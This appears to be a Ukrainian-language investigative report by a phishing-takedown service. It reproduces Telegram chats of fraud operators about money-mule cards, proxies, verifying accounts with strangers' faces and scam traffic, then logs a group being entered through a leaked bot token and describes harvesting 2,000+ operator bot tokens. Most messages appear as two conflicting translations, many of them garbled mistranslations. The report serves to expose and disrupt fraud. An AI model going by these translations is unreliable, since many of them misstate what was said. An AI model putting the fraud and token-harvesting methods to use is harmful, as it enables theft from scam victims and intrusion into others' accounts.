Боня2025-03-05 13:55
Хто чудово викладає — чи є там чат для студентів?У кого з викладачів курсу «Фантастика» є чат для учнів?
B
Боня2025-03-03 15:10
ЧекиЧеки
B
Боня2025-03-03 15:10
Той, що пилососитьЯка пилососить
B
Боня2025-03-03 15:10
ЗрозумілоЄ
B
Боня2025-03-03 15:10
Напевно, є й повії, які займаються програмним забезпеченням.Але тут точно є проблеми з програмним забезпеченням
B
Боня2025-03-03 15:09
Це булоБуло
B
Боня2025-03-03 15:09
О, це добре.О, це просто супер
B
Боня2025-03-03 15:09
Трінуріует руруТринуріует руру
B
Боня2025-03-03 15:09
І їх збираютьА їх збирають
B
Боня2025-03-03 15:09
Тіп просто сидить там і розгортає ці кляті обгорткиЦей хлопець сидить і розкидає фантики
B
Боня2025-03-03 15:04
Чому тут є українські номерні знаки?П: А навіщо на українську номери?
B
Боня2025-03-03 15:03
Я сказав: «kc».Я сказав «кц»
B
Боня2025-03-03 15:03
Я зрозумів.Я зрозумів
B
Боня2025-03-03 15:03
Якщо це складно, ти втратиш свій капелюх-котел.Якщо тут у тебе казан зірветься, то...
B
Боня2025-03-03 15:03
Бля, давай порівняємо, скільки разів ти прокрутиш рекап у Фейсбуці, поки я зніматиму ру з вогню.Бля, давай порівняємо: скільки разів ти запустиш рекап у Фейсбуці, поки я зніму руку
B
Боня2025-03-03 15:02
Для супроводуНа ескорт
B
Боня2025-03-03 15:02
У цих типів така хрінова вдача, що з них одразу виходить клятий мастурбатор.У цих типів розвиток зводиться до того, щоб завести якусь хрінову дрочку
B
Боня2025-03-03 15:02
Блядь, тут самі «вокери».Блін, тут одні вокери по ру
B
Боня2025-03-03 15:02
Які саме столиЯкі столи
B
Боня2025-03-03 15:01
Якщо у тебе гарний голос, то 30 — це твоє.30 — твої будуть, якщо голос гарний
B
Боня2025-03-03 15:01
Грошей більшеТам більше грошей
B
Боня2025-03-03 15:01
Приходьте працювати до мене на роботу.Прийшли до мене в культурний центр працювати
B
Боня2025-03-03 15:00
НіНі
B
Боня2025-03-03 14:59
PlategamПлатегам
B
Боня2025-03-03 14:59
+ Я не знаю, як користуватися функцією перегляду повтору+ я не розбираюся в повтегах
B
Боня2025-03-03 14:59
Хороші краплі — рідкість.Хороші дропи теж важко знайти
B
Боня2025-03-03 14:58
Або, може, є версія 1.0?Або версія 1.0 є
B
Боня2025-03-03 14:58
Тут лише 2,0 фіш.А тут фіші на струм 2,0
B
Боня2025-03-03 14:58
Або краще 1.0, ніж 2.0.Ну, а може, краще 1.0, ніж 2.0
B
Боня2025-03-03 14:57
З мамонтамиЗ мамонтами
B
Боня2025-03-03 14:57
Версія 2.0 не працює, якщо просто сидіти й байдикувати.2.0 — не варто сидіти й базікати
B
Боня2025-03-03 14:57
Я більше спеціалізуюся на дорожньому русі.Я вже не лідер за трафіком
B
Боня2025-03-03 14:57
Ось «X» від РуОсь «іксі» по ру
B
Боня2025-03-03 14:56
Але це не рекламні гаслаАле це не рекламні команди
B
Боня2025-03-03 14:56
Так, є. Я знаю одну таку людину.(Роблять) Є знайомі
B
Боня2025-03-03 14:56
Звісно, якщо ти знаєш, як заробляти 400–500 на день.Та що там, якщо вміти, то такі типи заробляють по 400–500 на день
B
Боня2025-03-03 14:55
То в чому ж проблема?)Ну так, а що ж я тут забув )
B
Боня2025-03-03 14:55
Тут є посилання на посібникТам є посилання на посібник
B
Боня2025-03-03 14:54
Ось такі рукиОсь такі ру заведуть
B
Боня2025-03-03 14:54
Блядь, слину пускають і поглядають, щоб отримати цю кляту руку.Щоб завести ру, можна навіть слини пускати, а очі — розвернути в різні боки
B
Боня2025-03-03 14:54
Ну, у чому проблема? Це ж та сама робота.Ну так, а в чому тут проблема? Це ж той самий ворк
B
Боня2025-03-03 14:53
Щоб дістатися до цієї зони, знадобиться місяцьДо зони доставлять за місяць
B
Боня2025-03-03 14:53
І нікуди йти. Якщо у тебе є розум, ти це зрозумієш. Якщо ні — то забирайся звідси.Та й розбиратися тут нема чого: є розум — розберешся, немає — що тут робити
B
Боня2025-03-03 14:53
Чого ти хочеш?А що ти хотів?
B
Боня2025-03-03 14:53
РекламаРеклама
B
Боня2025-03-03 14:52
Я тут вже 2 дні, і версія 2.0 мене не цікавить. А я думав, що вона класна.Я тут вже другий день, і версія 2.0 мені не цікава — я думав, що це буде щось класне
B
Боня2025-03-03 14:52
І з’їжте мамонтаІ завести мамонта
B
Боня2025-03-03 14:52
Подумай головою, що сказати.Спочатку треба подумати, що відповісти
B
Боня2025-03-03 14:52
Тут немає ніяких таємницьТут немає ніяких секретів
B
Боня2025-03-03 14:52
Що він тобі подарує?Що він вам дасть
B
Боня2025-03-03 14:52
Ну, який у цьому сенс, якщо в інструкції міститься та сама інформація?А який сенс, якщо в інструкції є вся ця інформація?
B
Боня2025-03-03 14:51
У нього буде час відповісти на всі ваші дурниціХай вам всім вдасться відповісти
B
Боня2025-03-03 14:51
Оце так тренування.Яка практика
B
Боня2025-03-03 14:51
У нього там 100 людей.Ой, там у нього по 100 осіб
B
Боня2025-03-03 14:51
Чому б тобі не дати мені трохи грошей, а я тобі віддам інструкцію з затискача?Може, кинете мені бабки — я вам дам інструкцію з закріплення
B
Боня2025-03-03 14:50
Під час кріпленняУ закріпленні
B
Боня2025-03-03 14:50
Тобі не потрібна інструкція, щоб навчитися всьому.А до біса вам навчання — у всіх є інструкція
B
Боня2025-03-03 14:50
Версія 2.0 — це те, що є.2.0: який був, такий і залишився
B
Боня2025-03-03 14:50
У біса, у чому проблема?Та що це за завдання таке
B
Боня2025-03-03 14:48
Це ти сам це розпочав?Ти вже сам заводив?
B
Боня2025-03-03 14:48
Не «ку-ку»Ніяк не ворк
B
Боня2025-03-03 14:48
На lk є запитУ ЛК є вбивство
B
Боня2025-03-03 14:48
Що там за справа з lk?Які вправи для ЛК
B
Боня2025-03-03 14:48
Хто з вас, як ви самі сказали, ці «козли»?З кого ти, блядь, це взяв, як би це сказати
B
Боня2025-03-03 14:47
Я не розумію, про що ти тут говориш.Ось тут я не зрозумів, що ти сказав
B
Боня2025-03-03 14:46
Якщо вони увійшли в систему, то чудово.Якщо заходять у особистий кабінет, то ЗБС
B
Боня2025-03-03 14:46
Ну, а вони входять у систему?То що, заходять у особистий кабінет?
B
Боня2025-03-03 14:45
Я не знаю, як вони їх знімають.Не знаю, я не розумію, як їх знімають
B
Боня2025-03-03 14:45
Собак, яких варто списати?Пуши на списання?
B
Боня2025-03-03 14:45
Блядь, тут же є клята кнопкаТа що там ще, хай собі пух тапає
B
Боня2025-03-03 14:42
Я сам це наливаюЯ сам поливаю
B
Боня2025-03-03 14:42
Я, блядь, зрозумів, що це не для тих, хто не давав ні хріна.Я, блядь, зрозумів, що це не на хрін
B
Боня2025-03-03 14:41
Брате, тут нічого не продають за жетони, це жетон для отримання зарплати.Братан, тут нічого не продають за фішки — тут фішки використовуються для оплати
B
Боня2025-03-03 14:41
Я розумію, нікуди це вилитиЯ зрозумів, що тут нікуди його виливати
B
Боня2025-03-03 14:40
Звичайна версія 2.0, здається.Звичайні 2.0, начебто
B
Боня2025-03-03 14:40
Це ж не так, ніби вони перевантажують трафікТож тут одразу не направляють трафік
-- Фбстор — чат успішних веб-майстрів! (23 повідомлення) --
B
Боня2025-02-26 07:51
Ну, роби, що хочеш, чорт забирай.Ну ось, роби там, що хочеш
B
Боня2025-02-26 07:50
Школяр — 200₽.Ну, школярці 200₽ даю
B
Боня2025-02-26 07:50
Це спрацюєЗійде
B
Боня2025-02-26 07:50
На вулиці ви зустрінете бездомного.На вулиці знайди безхатька
B
Боня2025-02-26 07:50
Отже, кожен вірить у власне обличчя, хай яке воно буде.Так всі там верифікуються на своє ім’я, та кому яке діло
B
Боня2025-02-26 07:50
На твоє обличчя.На власне обличчя
B
Боня2025-02-26 07:49
Але справа в тому, що, як би там не було, я це робив уже 10 разів.Але, власне, мені все одно — я так і так верифікую 10 акаунтів
B
Боня2025-02-26 07:49
Тож скажи мені, ти просто несеш нісенітниці.Тож скажи, ти що, чорнуху ллєш?
B
Боня2025-02-26 07:49
Ви можетеМожна
B
Боня2025-02-26 07:49
На твоє обличчя.На власне обличчя
B
Боня2025-02-16 20:26
замість того, щоб доводити їх до виснаження якимись тренуваннями та змушувати їх бігати по дорозі.а не, типу, дурити їх якимось навчанням і накручувати на них трафік
B
Боня2025-02-16 20:25
як зазвичай, на YouTube тощо.звичайні леї, UBT, TT, YouTube тощо
B
Боня2025-02-15 17:31
XzХз
B
Боня2025-02-15 17:31
Під приводом навчанняПід приводом навчання
B
Боня2025-02-15 17:31
До каналівНа канали
B
Боня2025-02-15 17:31
Це просто натовп людей.Просто трафік від людей набирає обертів
B
Боня2025-02-15 17:31
Отже, цей хлопець каже, щоб підписатися на всі його каналиОсь цей хлопець каже, щоб підписатися на всі його канали
B
Боня2025-02-15 16:36
Вам не потрібно писатиХуїню пропонує: можете не писати
B
Боня2025-02-06 15:11
Якщо ви не знаєте основ того, як правильно наливати, то вам доведетьсяЯкщо ти не знаєш таких основ, як, наприклад, як лити, то що ж ти будеш робити?
B
Боня2025-02-06 15:11
Є кнопка для зміни aipi, тож вам варто хоча б пошукати це в Google.Натиснувши на цю кнопку, можна змінити IP-адресу — спробуй пошукати в Google
B
Боня2025-02-06 15:09
Ви можете змінити положення aipi, обертаючи його.Там можна змінити порядок відображення
B
Боня2025-02-06 15:09
Чому 1? Це ж той самий «Mobile»Чому 1? Адже це ж «Мобільні»
-- CryptoGrab — ЧАТ взаємодопомоги (10 повідомлень) --
B
Боня2025-02-06 15:31
Це не так простоНе все так просто
B
Боня2025-02-06 15:31
Легко.Ізі
B
Боня2025-01-23 20:30
Жодного прикладуНе один приклад
B
Боня2025-01-23 20:30
Не смішно, що я не зміг знайти в Інтернеті жодної реклами тестів на AML.Та це ж не прикольно, що я взагалі не знайшов в інтернеті реклами тестів на АМЛ
B
Боня2025-01-23 17:20
На AML взагалі нічого немає.На AML взагалі нічого немає
B
Боня2025-01-23 17:20
Я спробував aml на Facebook, щоб знайти американські, а також інші корисні, навіть старі набори, яких немає в ІнтернетіЯ намагався знайти інформацію про АМЛ у Facebook, але в Інтернеті так само не знайшов ніяких корисних, навіть старих, посилань
B
Боня2025-01-23 17:19
Ну, а яку саме пропозицію ви плануєте зробити?А взагалі, яку пропозицію ти плануєш?
B
Боня2025-01-23 17:16
Ви користуєтеся aml?А ти лієш амл?
B
Боня2025-01-21 20:38
Усі, хто займається fb, хотіли б отримати відповіді на кілька запитаньЧи є хтось, хто веде сторінку у Facebook? Хотів би уточнити кілька питань
B
Боня2025-01-20 11:08
Чи є у когось приклади креос для AML?Чи є у когось приклади креативів для AML?
-- Rolex | загальний чат (28 повідомлень) --
B
Боня2024-09-11 15:29
Що роблять литовці на якому майданчику?А Литву на якій майданчику розгромлюють
B
Боня2024-09-11 15:21
Ти що, з гайкою бавишся?Ти що, з глузду з’їхав?
B
Боня2024-09-11 15:20
Просто ці сайти дуже обмежують можливості, і з ними доводиться так багато морочитисяПросто майданчики дуже обмежують роботу, і з ними стільки клопоту
B
Боня2024-09-11 15:19
У мене є ідея щодо теми. Якщо вони це зроблять, це буде просто неймовірно круто.Я там одну тему придумав і написав; якщо її реалізують, буде просто бомба
B
Боня2024-09-11 15:19
Я не бачу, щоб на фінці було багато колод.Логотипів на Фінке я, чесно кажучи, особливо не бачу
B
Боня2024-09-11 15:19
З усіма цими закладами там відбувається якась повна хрінь.Та ну, у них якісь типи влаштовують якусь хрінь на всіх майданчиках
B
Боня2024-09-11 15:16
Ось про що я й кажу: це ніби брід на броді.Ну я й кажу, що це фрод на фроді
B
Боня2024-09-11 15:15
Я не можу зрозуміти, що зараз покращилося, адже бачу, що у Фінляндії ніхто не працює.Я взагалі не можу зрозуміти, що зараз працює краще, бачу, що у всіх з Фінкою щось не працює
B
Боня2024-09-11 15:08
Ну, шанси 50 на 50, що вам пощастить із проксі-серверами.Ну, 50 на 50, якщо пощастить із проксі
B
Боня2024-09-11 15:07
Але щоб ви розуміли: сьогодні, з появою «люкс-проксі», навіть у Viber, коли ви входите в систему, система просто збивається з пантелику.Але щоб ти зрозумів: зараз із проксі-серверами навіть у Viber, коли заходиш, все працює як слід
B
Боня2024-09-11 15:07
Ну, щодо банок з ЄС я не знаю.Ну, я в європейських банках не розбираюся
B
Боня2024-09-11 15:07
У lkУ особистий кабінет
B
Боня2024-09-11 15:06
Раніше в гастрономах було по 10 холодильних камерРаніше лакшери витримували 10 проходів
B
Боня2024-09-11 15:06
Ну, 922 теж на 1-му місці і тримається.Ну, 922 теж — 1 заходять, тримають
B
Боня2024-09-11 15:05
Навіть приват після трьох візитів їх лякає.Навіть у приваті після трьох спроб їх обманюють
B
Боня2024-09-11 15:05
Якщо 1 проксі — 1–2 банкиЯкщо 1 проксі — 1–2 банки струму
B
Боня2024-09-11 15:05
Ну, це залежить від того, який саме банкНу, це залежить від того, який банк
B
Боня2024-09-11 15:04
У цій лакшері-нісенітниці проксі-сервери часто бувають бруднимиУ лакшері хуїня проксі часто бувають брудні
B
Боня2024-09-11 08:44
Воно спить?А він спить?
B
Боня2024-09-11 08:40
О, це чудова ідея.О, ЗБС придумав
B
Боня2024-09-11 08:40
А у них хіба немає чогось на зразок блошиного ринку чи чогось такого?А чому у них немає, типу, барахолок тут і там?
B
Боня2024-09-11 08:40
Повна халепаХуево
B
Боня2024-09-11 08:39
БіляБіля
B
Боня2024-09-11 08:39
Чи є чати?А там є чати?
B
Боня2024-09-11 08:38
Хтось знає?Хто-небудь знає
B
Боня2024-09-11 08:38
Чи користуються мешканці «фінки» Telegram?У Фінці люди користуються Telegram?
B
Боня2024-09-10 12:14
Дякую.Дякую
B
Боня2024-09-10 12:13
Котра година у Фінляндії?Скок, зараз час у Фінці
-- Актуальне/верифікації/заробіток💃🛍 (37 повідомлень) --
B
Боня2024-06-16 17:17
Я не бачу серед них жодних затятих захисниківЯ не бачу тут її затятих захисників
B
Боня2024-06-16 17:17
Ну, загалом, ситуація викладена, і тепер кожен сам приймає рішення, а те, що її захищає лише адміністратор Паша, багато про що говорить.Ну що ж, я розповів про ситуацію, а далі кожен сам робить свій вибір, а те, що її захищає лише адмін Паша, багато про що говорить
B
Боня2024-06-16 17:15
І вона знову не виплатила грошіІ вона знову не сплатила
B
Боня2024-06-16 17:15
Ні, вона переказала нам гроші, але у нас не було основного рахунку для переказу коштів, тому ми, як крайній захід, написали Віці.Ні, вона переклала це на нас, а у нас не було основного способу переказу грошей, тож ми написали Віці як крайній варіант
B
Боня2024-06-16 17:14
Спочатку у нас теж все було гаразд, але останнім часом твої гроші постійно зникають.Спочатку у нас теж усе було нормально, а останнім часом у вас постійно зникають гроші
B
Боня2024-06-16 17:14
Чи я спамлю? Я просто сиджу тут і кажу людям правду. Можете це видалити. Нехай люди знають, як ви працюєте.А у мене спам? Я сиджу й розповідаю людям правду, можеш це видалити — що зміниться? Нехай люди знають, як ви працюєте
B
Боня2024-06-16 17:13
Якщо у вас є один із такихКоли у вас трапиться щось подібне
B
Боня2024-06-16 17:13
Тож настав час вам задуматисяТож саме час задуматися
B
Боня2024-06-16 17:13
Ми теж вже давно співпрацюємо з nei, і це вже другий такий випадокМи з нею теж вже давно працюємо, і це вже друга така ситуація
B
Боня2024-06-16 17:13
І вона записала ці дані та сказала: «Ти ж знаєш, як це працює».А вона записала ГС і сказала, що ви знаєте, як це працює
B
Боня2024-06-16 17:13
Ось у чому справа: давайте почнемо з самого початку. Ми взяли її картку, щоб зняти гроші, поклали туди 60 тисяч, вона пішла знімати їх і пише, що грошей там не буде, бо банкомат проковтнув картку — і все, ми просто викинули 60 тисяч.Ось саме так і було: давайте почнемо спочатку. Ми взяли у неї картку, поклали на неї 60 тис., вона пішла знімати гроші, а потім написала, що грошей не буде — нібито банкомат застряг з її карткою, і все — ми просто втратили 60 тис.
B
Боня2024-06-16 17:11
Це не вона нас тримаєА не ми у неї
B
Боня2024-06-16 17:11
Хоча у нас і вкрали 60 тисячХоча у нас вкрали 60 тис.
B
Боня2024-06-16 17:11
Нормально? Ми тут усе пояснили. Ти ж кажеш, що ми ідіоти.Нормальні? Ми тут усе пояснили, а ви кажете, що ми дебіли
B
Боня2024-06-16 17:10
Ти її захищаєшВи її захищаєте
B
Боня2024-06-16 17:10
Вона досі тримає наші грошіНаші гроші залишилися у неї
B
Боня2024-06-16 17:10
Усі вониВсе
B
Боня2024-06-16 17:10
Коли чоловікові дали 60 тисяч, вона сказала, що грошей немає.Коли людині переказали 60 тисяч, вона сказала, що грошей не буде
B
Боня2024-06-16 17:10
Описано*Описали*
B
Боня2024-06-16 17:10
Вам вже розповіли про всю ситуаціюТобі описали всю ситуацію
B
Боня2024-06-16 17:09
Хто тут зрадив? Вона чи ми?Хто тут дроп-подавець — вона чи ми?
B
Боня2024-06-16 17:09
У нас на рахунку 60 тисяч. Де ці гроші?Переказали 60 тис., де гроші?
B
Боня2024-06-16 17:09
Вам уже все пояснили, і не має значення, якої ви статі.Які жінки тобі пояснили всю ситуацію — стать тут абсолютно не має значення
B
Боня2024-06-16 17:08
Зніми 60 тисяч і на цьому закінчуй.Зібрати 60 тис. і забути про це
B
Боня2024-06-16 17:08
Або пішов ти в дупу — в межах розумного.Або, блядь, у вас це в межах розумного
B
Боня2024-06-16 17:08
Людям немає за що платитиЗвідки людям брати гроші
B
Боня2024-06-16 17:08
І він каже, що картка застрягла в терміналі, і в нього закінчилися гроші.І каже, що картка застрягла, грошей немає
B
Боня2024-06-16 17:08
Чоловікові дали 60 тисяч, а вона пішла знімати.Людині переказали 60 тис., і вона пішла знімати
B
Боня2024-06-16 17:07
Тож ти мені розповіси, як все було насправді.Тож поясни, будь ласка, чому
B
Боня2024-06-16 17:07
То хто, блядь, тут винен, хто ж той «дропер», яким я є?Так а хто, блядь, винен, хто тут винен — я?
B
Боня2024-06-16 17:07
Немає що сказати?Немає що сказати?
B
Боня2024-06-16 17:07
Або я не зміг би ввести цей клятий пін-код.Або що, блядь, руки криві — навіть пін не змогла набрати
B
Боня2024-06-16 17:06
Як, блядь, банкомат міг застрягнути картку?Як, блядь, банкомат міг затягнути картку?
B
Боня2024-06-16 17:06
ПрисоскиПідсмоктування
B
Боня2024-06-16 17:06
А ти, блядь, за неї вболіваєш.А ви, блядь, навіщо тут за неї скачуєте?
B
Боня2024-06-16 17:06
Ви, блядь, «природжені таланти», — справжні ідіоти. У вас тут сидить, блядь, жінка, яка намагається розібратися зі своїми грошима, а її картку, блядь, затягнуло в банкомат.Та, блядь, ви, блядь, ідіоти, у вас сидить якась херня, яка до дідька в’їдається, що банкомат заклинив її картку
B
Боня2024-06-16 16:40
@kysia1987 — це шахрайство, не працює: зробив «дропкік» і об’єднався з 60 тис.@kysia1987 — це шахрайство, не працює: дала невелику суму і зникла з 60 тис.
МОНЕТТІ ЕСКОБАР: «Мовчазний бос»
На відміну від 261 повідомлення Боньї, у MONETTI є лише 10 публічних повідомлень — все в одному потоці на Чат TraFFeeQ (Арбітраж чорного трафіку ADS/SEO), на захист колеги:
Чат TraFFeeQГрудень 2025 року
«Людина виконує свою роботу, їй за це платять — хочеш обговорити?»
Людина виконує свою роботу, їй за це платять, про що тут говорити)
Нормалізація злочинної діяльності як «просто роботи»
Чат TraFFeeQГрудень 2025 року
«З тобою немає про що говорити»
З тобою немає про що говорити
Авторитарний підхід — менталітет начальника, що не допускає дискусій
Чат TraFFeeQГрудень 2025 року
«Крім тебе, є ще купа справ!»
Без тебе є чим зайнятися)
Це означає, що одночасно відбувається кілька операцій, які вимагають його уваги
Решту можна дізнатися в Telegram-групах MONETTI: Medusa Google Ads (шахрайство з PPC методом «чорної шапки»), а Канал «Deepfakes» (синтетичні засоби для шахрайства), а також ЧАТ «MARLBORO» (приватний, невідомий). Підписка на Telegram Premium, цілодобовий режим роботи та «Є пропозиція» («У мене є пропозиція») Біографії бізнесменів створюють враження про людину, яка ставиться до кіберзлочинності як до повноцінного бізнесу.
МОНЕТТІ ЕСКОБАР: Повний журнал повідомлень (10 повідомлень)
-- TraFFeeQ Chat | Арбітраж трафіку | Чорні методи в рекламі та SEO | (9 повідомлень) --
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:42
Залиш це!Залиш це!
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:42
Чоловік виконує свою роботуЛюдина займається своєю роботою
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:42
Без агресіїЖодної агресії
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:40
Про це теж не хвилюйсяНе переймайся і з цього приводу
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:39
Поговори з ним, брате. Йому це не заборонено.Поспілкуйся з ним, брате, йому ж це не забороняли
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:39
(Крім тебе, тут ще є чим зайнятися!)Є чим зайнятися, крім тебе!)
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:39
З тобою немає про що говоритиЗ тобою немає про що говорити
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:38
Це написано поруч із його прізвиськом. Не треба натискати — ти й так це прочитаєш.Біля його ніка написано: «Не треба тикати», — прочитай
Я
МОНЕТТІ ЕСКОБАР2025-12-06 20:38
Чоловік виконує свою роботу, йому за це платять (хотів би обговорити)Людина виконує свою роботу, за це отримує гроші, якщо хочете — обговорюйте)
-- Медуза | Google Ads | Чат (1 повідомлення) --
Я
МОНЕТТІ ЕСКОБАР2025-09-23 18:07
😍😍

Знімок екрана 2 — профіль MONETTI у Telegram.

Знімок екрана 3 — профіль Боні. Зверніть увагу на DC2 (Амстердам).
Розділ 7: «Кімната паніки»
Після того, як PhishDestroy отримав доступ до групи операторів через уразливого бота в Telegram, відбувся такий обмін повідомленнями. Наведений нижче лог чату перекладено англійською мовою, при цьому оригінальний російський текст збережено курсивом. Ідентифікаційні дані, використані для доступу, було приховано.
— REDACTED увійшов у систему за допомогою викритого токена бота —
R
ВИДАЛЕНО25-03-2026 13:03:43
/start
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:06:53
?
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:07:03
ХтоХто
B
Боня25-03-2026 13:07:14
XzХз
R
ВИДАЛЕНО25-03-2026 13:07:14
Привіт, просто натисніть, щоб зберегти дані, зачекайте хвилину
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:07:24
Що за хріньЩо, блядь
B
Боня25-03-2026 13:07:27
БлядьБлядь
B
Боня25-03-2026 13:07:28
Ось хтоХто це
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:07:42
Ага.Ахаха
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:07:44
Що за хрінь?Що за хрінь
B
Боня25-03-2026 13:07:53
Бот був зламанийБота зламали
B
Боня25-03-2026 13:08:16
Мені сказали, що наша оборона — повний провал.Мені, до речі, казали, що у нас захист просто заоблачний
B
Боня25-03-2026 13:08:22
Ну, є такий типНу, там якийсь хлопець
B
Боня25-03-2026 13:08:43
Це як зламати бота за допомогою фішингової атаки.У нас бота через фіш зламати — це як пальцем по пальцю вдарити
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:09:09
@devosus
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:09:21
[ВИДАЛЕНО].[ВИДАЛЕНО]
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:09:24
Хто це?Це хто?
B
Боня25-03-2026 13:10:29
Перевірте свій профіль.Перевір свій профіль
B
Боня25-03-2026 13:10:32
Це хакерЦе хакер
B
Боня25-03-2026 13:10:35
У буквальному сенсі.У прямому сенсі
B
Боня25-03-2026 13:10:41
Переклав те, що він передаєПереклали те, що він пише у каналі
B
Боня25-03-2026 13:10:55
[ВИДАЛЕНО — Боня копіює та вставляє повідомлення з каналу, який повідомив про їхній домен, намагаючись з’ясувати, хто їх позначив]
B
Боня25-03-2026 13:12:19
Отже, е-е-е...Ну, що ж...
B
Боня25-03-2026 13:12:23
Я, блядь, не знаю, хто це.Хто це, блядь, знає
B
Боня25-03-2026 13:12:25
Але не назавждиАле не на краще
B
Боня25-03-2026 13:12:47
@devosus, давай подумаємо про оборону, перш ніж нас рознесуть вщент.@devosus, подумай про захист, поки нам дупу не розірвали
Примітка редактора: Боня відчуває, що це наближається. Припустимо, він росіянин і вважає шахрайство щодо України «патріотичним». А що тоді сказати про Індонезію —
Партнер БРІКС з жовтня 2024 року (Саміт у Казані)? Чи можна також вважати патріотичним обкрадати громадян своїх союзників? Шахраї з країн СНГ — це злодії, які не роблять винятків, не мають ані розуму, ані лояльності. Ознайомтеся з нашими іншими розслідуваннями, в яких ми задокументували
випадки притягнення до кримінальної відповідальності для подібних операторів — результат завжди однаковий.
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:12:49
Так, я це бачу.Так, я бачу
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:12:55
Іди в дупу.Та ти що, хрінь несеш
B
Боня25-03-2026 13:13:09
Ну, і відчувати, як з тебе висмоктують сили, теж не дуже приємно.Ну, бути злитими теж не дуже приємно
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:13
Він нічого не зробитьВін нічого не зробить
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:18
Що він збирається робити?Що він злиє?
D
Девойс25-03-2026 13:13:26
що це такещо це
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:34
Так, один хлопець приєднавсяТак, людина приєдналася
D
Девойс25-03-2026 13:13:34
звідкизвідки
B
Боня25-03-2026 13:13:35
Навіть якщо ти кілька разів заходив на фішинговий сайт зі своєї IP-адреси, це вже не круто.Навіть якщо я вже пару разів заходив на «Фіш» зі свого IP-адреси, це вже не так цікаво
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:37
ГрупіДо групи
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:38
XzХз
D
Девойс25-03-2026 13:13:39
під час інтерполяціїколи в Інтерпол
D
Девойс25-03-2026 13:13:41
на щодо якої
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:44
Ось цейЦією
B
Боня25-03-2026 13:13:46
Я просто зайшов сюди, щоб поспілкуватисяЗайди сюди, у чат
B
Боня25-03-2026 13:13:49
Він написав, щоНаписав, що
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:13:56
.
B
Боня25-03-2026 13:13:57
Привіт, просто натисніть, щоб зберегти дані, зачекайте хвилину
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:14:11
[Опубліковано фото]
D
Девойс25-03-2026 13:14:31
Я їх уже бачив раніше.Я таких вже бачив
B
Боня25-03-2026 13:14:44
Ну, нас теж викрили через бота «ukr».Ну, нас і через укр-бот ламали
B
Боня25-03-2026 13:14:55
Ти не писав повідомлень у чаті.Про це в чаті не писали
B
Боня25-03-2026 13:14:57
Хіба ти не писавА ні, писали
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:15:04
Мені на це начхати.Та й хрін з тим
B
Боня25-03-2026 13:15:06
Від імені каналуВід імені каналу
D
Девойс25-03-2026 13:15:23
Забудь про це, блядь.та пішов ти на хрін
Я
МОНЕТТІ ЕСКОБАР25-03-2026 13:15:31
Я розвалюю цю групуЯ видаляю цю групу
D
Девойс25-03-2026 13:15:35
тактак
— Група видалена власником —
Група була видалена за лічені хвилини. Прощальне підтвердження Боні — «+» — та підтвердження Девойса «так» говорять самі за себе: вони розуміли, що їх викрили, і єдиним виходом для них було знищити докази. Але на той момент дані вже були зібрані.
Зверніть увагу на промовистий коментар Боні: «Нас також атакували через український бот» — що підтверджує: обидва проекти (український та індонезійський) мають одну й ту саму команду операторів, і це не перший випадок, коли їхня інфраструктура зазнала атаки.
Розділ 8: Що це свідчить
Як працює PhishDestroy
Кожен домен, який з’являється на phishdestroy.io проходить через цей автоматизований Pipeline. dopomogvoina[.]sbs не став винятком.
Виявлення
Статичний аналіз
Картування інфраструктури
Відкриття походження
OSINT
Формування звітів
Хронологія розслідування
20 березня 2026 року
Домен dopomogvoina[.]sbs зареєстровано через компанію NiceNIC International
21 березня 2026 року
Виявлено автоматизованою Pipeline PhishDestroy
21 березня 2026 року
Повний автоматизований аналіз завершено: інфраструктура відображена на карті, пакет JS розшифровано, протокол WebSocket задокументовано
22 березня 2026 року
Виявлено IP-адресу джерела. На тому самому сервері виявлено другий фішинговий проект («HealthCare ID»)
22 березня 2026 року
Викрито config.json дозволяє ідентифікувати оператора за допомогою Telegram Bot API
23 березня 2026 року
Повідомлення про зловживання, подані до хостинг-провайдера, компанії Cloudflare та відповідних центрів реагування на інциденти (CERT)
25 березня 2026 року
Стаття опубліковано. Звіти про домени доступні на сайті PhishDestroy
Як це стало можливим: мережа інтелектуальних ботів PhishDestroy
Це розслідування було повністю проведено автоматизовані системи. Система PhishDestroy не просто виявляє фішингові домени — вона проникає в інфраструктуру операторів, що стоїть за ними.
2,000+
Зібрано ботів Telegram
Активний
Деякі боти все ще перебувають під наглядом
З 2024 року
Збір коштів триває
Коли фішингові набори розкривають токени ботів Telegram — як це сталося в даному випадку через config.json — наша система автоматично збирає їх, формує групи операторів, витягує списки учасників та архівує історію повідомлень. Понад 2 000 ботів Збираються таким чином з 2024 року. Деякі з них досі діють, і нам цікаво спостерігати за діями злочинців у реальному часі — адже фінал уже відомий.
Навіть оператори, які видаляють свої акаунти або очищають свої групи, роблять це занадто пізно. До того часу, як вони починають панікувати, ми вже маємо все — архіви повідомлень, дані профілів, членство в групах, підключені боти. Видалення нічого не змінює. Ці дані існували, і тепер вони містяться в нашій базі даних.
«Чекай на мене» — версія для шахраїв
